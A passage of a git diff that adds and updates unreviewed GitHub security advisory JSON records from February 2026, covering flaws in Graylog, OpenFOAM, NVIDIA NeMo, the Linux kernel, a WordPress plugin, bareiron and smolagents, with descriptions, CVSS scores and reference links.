}, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json new file mode 100644 index 0000000000000..4721f7998d570 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-cw7v-qx8m-563q/GHSA-cw7v-qx8m-563q.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cw7v-qx8m-563q", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1438" + ], + "details": "Reflected Cross-Site Scripting (XSS) vulnerability in the Graylog Web Interface console, version 2.2.3, caused by a lack of proper sanitization and escaping in HTML output. Several endpoints include segments of the URL directly in the response without applying output encoding, allowing an attacker to inject and execute arbitrary JavaScript code when a user visits a specially crafted URL. Exploitation of this vulnerability may allow script execution in the victim's browser and limited manipulation of the affected user's session context, through the  '/system/nodes/' endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1438" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:06Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json new file mode 100644 index 0000000000000..19cf6653aedee --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f7cx-4c4g-9g59/GHSA-f7cx-4c4g-9g59.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f7cx-4c4g-9g59", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-61982" + ], + "details": "An arbitrary code execution vulnerability exists in the Code Stream directive functionality of OpenCFD OpenFOAM 2506. A specially crafted OpenFOAM simulation file can lead to arbitrary code execution. An attacker can provide a malicious file to trigger this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-61982" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2292" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:39Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json b/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json new file mode 100644 index 0000000000000..2606d106a8a7d --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f86v-54pm-58q4/GHSA-f86v-54pm-58q4.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f86v-54pm-58q4", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33236" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where malicious data created by an attacker could cause code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33236" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33236" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:02Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json new file mode 100644 index 0000000000000..36804edf5a62e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-ff7j-jwgr-hgxp/GHSA-ff7j-jwgr-hgxp.json @@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff7j-jwgr-hgxp", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-1436" + ], + "details": "Improper Access Control (IDOR) in the Graylog API, version 2.2.3, which occurs when modifying the user ID in the URL. An authenticated user can access other user's profiles without proper authorization checks. Exploiting this vulnerability allows valid users of the system to be listed and sensitive third-party information to be accessed, such as names, email addresses, internal identifiers, and last activity. The endpoint 'http://:12900/users/' does not implement object-level authorization validations.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1436" + }, + { + "type": "WEB", + "url": "https://www.incibe.es/en/incibe-cert/notices/aviso/multiple-vulnerabilities-graylog" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-639" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:05Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json b/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json new file mode 100644 index 0000000000000..f45ebc2defe70 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fjxh-qxr5-g7j4/GHSA-fjxh-qxr5-g7j4.json @@ -0,0 +1,45 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fjxh-qxr5-g7j4", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71228" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nLoongArch: Set correct protection_map[] for VM_NONE/VM_SHARED\n\nFor 32BIT platform _PAGE_PROTNONE is 0, so set a VMA to be VM_NONE or\nVM_SHARED will make pages non-present, then cause Oops with kernel page\nfault.\n\nFix it by set correct protection_map[] for VM_NONE/VM_SHARED, replacing\n_PAGE_PROTNONE with _PAGE_PRESENT.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71228" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/046303283d02c9732a778ccdeea433a899c78cbd" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/380d7c1af4bd3e797692f5410ab374a98e766cd4" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/5fbdf95d2575ec53fd4a5c18e789b4d54a0281fe" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9531210f348aa78e260a9e5b0d1a6f7e7aa329e6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/d5be446948b379f1d1a8e7bc6656d13f44c5c7b1" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json b/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json new file mode 100644 index 0000000000000..8b8da0f7c4111 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-fqmg-pv5x-v55p/GHSA-fqmg-pv5x-v55p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fqmg-pv5x-v55p", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33252" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33252" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33252" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json b/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json new file mode 100644 index 0000000000000..36922284a047a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-g5pw-hppv-79r6/GHSA-g5pw-hppv-79r6.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g5pw-hppv-79r6", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23215" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nx86/vmware: Fix hypercall clobbers\n\nFedora QA reported the following panic:\n\n BUG: unable to handle page fault for address: 0000000040003e54\n #PF: supervisor write access in kernel mode\n #PF: error_code(0x0002) - not-present page\n Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS edk2-20251119-3.fc43 11/19/2025\n RIP: 0010:vmware_hypercall4.constprop.0+0x52/0x90\n ..\n Call Trace:\n vmmouse_report_events+0x13e/0x1b0\n psmouse_handle_byte+0x15/0x60\n ps2_interrupt+0x8a/0xd0\n ...\n\nbecause the QEMU VMware mouse emulation is buggy, and clears the top 32\nbits of %rdi that the kernel kept a pointer in.\n\nThe QEMU vmmouse driver saves and restores the register state in a\n\"uint32_t data[6];\" and as a result restores the state with the high\nbits all cleared.\n\nRDI originally contained the value of a valid kernel stack address\n(0xff5eeb3240003e54). After the vmware hypercall it now contains\n0x40003e54, and we get a page fault as a result when it is dereferenced.\n\nThe proper fix would be in QEMU, but this works around the issue in the\nkernel to keep old setups working, when old kernels had not happened to\nkeep any state in %rdi over the hypercall.\n\nIn theory this same issue exists for all the hypercalls in the vmmouse\ndriver; in practice it has only been seen with vmware_hypercall3() and\nvmware_hypercall4(). For now, just mark RDI/RSI as clobbered for those\ntwo calls. This should have a minimal effect on code generation overall\nas it should be rare for the compiler to want to make RDI/RSI live\nacross hypercalls.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23215" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2687c848e57820651b9f69d30c4710f4219f7dbf" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2f467a92df61eb516a4ec36ee16234dd4e5ccf00" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/feb603a69f830acb58f78d604f0c29e63cd38f87" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json b/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json new file mode 100644 index 0000000000000..fb67f20527cec --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-gcr4-23wm-438x/GHSA-gcr4-23wm-438x.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcr4-23wm-438x", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2026-2386" + ], + "details": "The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 6.4.7. This is due to the tpae_create_page() AJAX handler authorizing users only with current_user_can('edit_posts') while accepting a user-controlled 'post_type' value passed directly to wp_insert_post() without post-type-specific capability checks. This makes it possible for authenticated attackers, with Author-level access and above, to create arbitrary draft posts for restricted post types (e.g., 'page' and 'nxt_builder') via the 'post_type' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2386" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463156/the-plus-addons-for-elementor-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/4fc3e24a-8b51-4b6f-bacf-665ceb03bc05?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T13:16:21Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json index 2f46e7efbfcc7..6afefb367e23a 100644 --- a/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json +++ b/advisories/unreviewed/2026/02/GHSA-ghfm-hghj-9j75/GHSA-ghfm-hghj-9j75.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-ghfm-hghj-9j75", - "modified": "2026-02-12T18:30:24Z", + "modified": "2026-02-18T15:31:24Z", "published": "2026-02-12T18:30:24Z", "aliases": [ "CVE-2025-69806" ], "details": "p2r3 bareiron commit: 8e4d4020d contains an Out-of-bounds Read, which allows unauthenticated remote attackers to get relative information leakage via a packet sent to the server", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -24,8 +29,10 @@ } ], "database_specific": { - "cwe_ids": [], - "severity": null, + "cwe_ids": [ + "CWE-125" + ], + "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2026-02-12T18:16:08Z" diff --git a/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json b/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json new file mode 100644 index 0000000000000..a8f98507e8d9f --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-h85r-3jrw-9546/GHSA-h85r-3jrw-9546.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-h85r-3jrw-9546", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23213" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/amd/pm: Disable MMIO access during SMU Mode 1 reset\n\nDuring Mode 1 reset, the ASIC undergoes a reset cycle and becomes\ntemporarily inaccessible via PCIe. Any attempt to access MMIO registers\nduring this window (e.g., from interrupt handlers or other driver threads)\ncan result in uncompleted PCIe transactions, leading to NMI panics or\nsystem hangs.\n\nTo prevent this, set the `no_hw_access` flag to true immediately after\ntriggering the reset. This signals other driver components to skip\nregister accesses while the device is offline.\n\nA memory barrier `smp_mb()` is added to ensure the flag update is\nglobally visible to all cores before the driver enters the sleep/wait\nstate.\n\n(cherry picked from commit 7edb503fe4b6d67f47d8bb0dfafb8e699bb0f8a4)", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23213" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0de604d0357d0d22cbf03af1077d174b641707b6" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/c1853ebbec980d5c05d431bfd6ded73b1363fd00" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/cd7ff7fd3e4b77f0b5a292e0926532eaa07c5162" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json index a8930d6998337..c464106558174 100644 --- a/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json +++ b/advisories/unreviewed/2026/02/GHSA-hr8m-gc74-4f7w/GHSA-hr8m-gc74-4f7w.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-284" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json b/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json new file mode 100644 index 0000000000000..2ed94c898f5de --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hr98-gm7c-926r/GHSA-hr98-gm7c-926r.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hr98-gm7c-926r", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-71225" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: suspend array while updating raid_disks via sysfs\n\nIn raid1_reshape(), freeze_array() is called before modifying the r1bio\nmemory pool (conf->r1bio_pool) and conf->raid_disks, and\nunfreeze_array() is called after the update is completed.\n\nHowever, freeze_array() only waits until nr_sync_pending and\n(nr_pending - nr_queued) of all buckets reaches zero. When an I/O error\noccurs, nr_queued is increased and the corresponding r1bio is queued to\neither retry_list or bio_end_io_list. As a result, freeze_array() may\nunblock before these r1bios are released.\n\nThis can lead to a situation where conf->raid_disks and the mempool have\nalready been updated while queued r1bios, allocated with the old\nraid_disks value, are later released. Consequently, free_r1bio() may\naccess memory out of bounds in put_all_bios() and release r1bios of the\nwrong size to the new mempool, potentially causing issues with the\nmempool as well.\n\nSince only normal I/O might increase nr_queued while an I/O error occurs,\nsuspending the array avoids this issue.\n\nNote: Updating raid_disks via ioctl SET_ARRAY_INFO already suspends\nthe array. Therefore, we suspend the array when updating raid_disks\nvia sysfs to avoid this issue too.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-71225" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/0107b18cd8ac17eb3e54786adc05a85cdbb6ef22" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/165d1359f945b72c5f90088f60d48ff46115269e" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/2cc583653bbe050bacd1cadcc9776d39bf449740" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json b/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json new file mode 100644 index 0000000000000..7228d86753e3b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hvjw-vp7g-39h5/GHSA-hvjw-vp7g-39h5.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hvjw-vp7g-39h5", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2025-33253" + ], + "details": "NVIDIA NeMo Framework contains a vulnerability where an attacker could cause remote code execution by convincing a user to load a maliciously crafted file. A successful exploit of this vulnerability might lead to code execution, denial of service, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33253" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33253" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json b/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json new file mode 100644 index 0000000000000..86315bba8ad57 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-j9p7-7ww6-3mjx/GHSA-j9p7-7ww6-3mjx.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j9p7-7ww6-3mjx", + "modified": "2026-02-18T15:31:25Z", + "published": "2026-02-18T15:31:25Z", + "aliases": [ + "CVE-2025-33249" + ], + "details": "NVIDIA NeMo Framework for all platforms contains a vulnerability in a voice-preprocessing script, where malicious input created by an attacker could cause a code injection. A successful exploit of this vulnerability might lead to code execution, escalation of privileges, information disclosure, and data tampering.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-33249" + }, + { + "type": "WEB", + "url": "https://nvidia.custhelp.com/app/answers/detail/a_id/5762" + }, + { + "type": "WEB", + "url": "https://www.cve.org/CVERecord?id=CVE-2025-33249" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-77" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:03Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json b/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json new file mode 100644 index 0000000000000..f6b45d7ec529b --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jfq5-qg8x-7rmp/GHSA-jfq5-qg8x-7rmp.json @@ -0,0 +1,53 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jfq5-qg8x-7rmp", + "modified": "2026-02-18T15:31:27Z", + "published": "2026-02-18T15:31:27Z", + "aliases": [ + "CVE-2026-23216" + ], + "details": "In the Linux kernel, the following vulnerability has been resolved:\n\nscsi: target: iscsi: Fix use-after-free in iscsit_dec_conn_usage_count()\n\nIn iscsit_dec_conn_usage_count(), the function calls complete() while\nholding the conn->conn_usage_lock. As soon as complete() is invoked, the\nwaiter (such as iscsit_close_connection()) may wake up and proceed to free\nthe iscsit_conn structure.\n\nIf the waiter frees the memory before the current thread reaches\nspin_unlock_bh(), it results in a KASAN slab-use-after-free as the function\nattempts to release a lock within the already-freed connection structure.\n\nFix this by releasing the spinlock before calling complete().", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-23216" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/275016a551ba1a068a3bd6171b18611726b67110" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/3835e49e146a4e6e7787b29465f1a23379b6ec44" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/48fe983e92de2c59d143fe38362ad17ba23ec7f3" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/73b487d44bf4f92942629d578381f89c326ff77f" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/8518f072fc92921418cd9ed4268dd4f3e9a8fd75" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/9411a89e9e7135cc459178fa77a3f1d6191ae903" + }, + { + "type": "WEB", + "url": "https://git.kernel.org/stable/c/ba684191437380a07b27666eb4e72748be1ea201" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T15:18:42Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json b/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json new file mode 100644 index 0000000000000..d4eebd331c726 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jxgv-6j54-wwc7/GHSA-jxgv-6j54-wwc7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jxgv-6j54-wwc7", + "modified": "2026-02-18T15:31:26Z", + "published": "2026-02-18T15:31:26Z", + "aliases": [ + "CVE-2026-2654" + ], + "details": "A weakness has been identified in huggingface smolagents 1.24.0. Impacted is the function requests.get/requests.post of the component LocalPythonExecutor. Executing a manipulation can lead to server-side request forgery. It is possible to launch the attack remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2654" + }, + { + "type": "WEB", + "url": "https://github.com/CH0ico/CVE_choco_smolagent/blob/main/report.md#proof-of-concept-execution" + }, + { + "type": "WEB", + "url": "https://github.com/CH0ico/CVE_choco_smolagent/tree/main" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.346451" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.346451" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.752774" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T14:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json b/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json new file mode 100644 index 0000000000000..a480dfcae2b72 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-m8v3-m8mg-rrc7/GHSA-m8v3-m8mg-rrc7.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m8v3-m8mg-rrc7", + "modified": "2026-02-18T15:31:27Z", + "published": 